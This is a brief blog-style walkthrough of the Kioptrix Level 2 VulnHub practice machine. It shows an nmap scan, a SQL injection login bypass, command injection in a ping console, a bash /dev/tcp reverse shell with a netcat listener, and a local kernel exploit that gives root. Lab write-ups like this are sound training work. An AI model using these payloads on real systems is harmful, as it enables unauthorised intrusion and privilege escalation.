1 minute read

Hello all.

You can download Kioptrix from Vulnhub.

As always I started to enumerate with nmap:

Syrion:~ syrion$ nmap -sT -sV -p 1-65535
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-01-07 00:18 CET
Nmap scan report for
Host is up (0.0014s latency).
Not shown: 65528 closed ports
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
788/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)

On port 80 there was this vulnerable login:


By using ‘ or 1=1 — – as username I successfully logged in:


There was this “Basic Administrative Web Console”. By giving an ip address, it performed a ping command:


Nice!!! It looked like a Command Injection Vulnerability!!! I succesfully executed a “ls” command by using this input:



I opened a reverse shell:

;bash -i >& /dev/tcp/ 0>&1
Syrion:~ syrion$ nc -l 4444
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

I noticed that this linux kernel version was vulnerable to this exploit:

bash-3.00$ gcc exp.c -o exp
bash-3.00$ ./exp
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

It was done!

Good bye!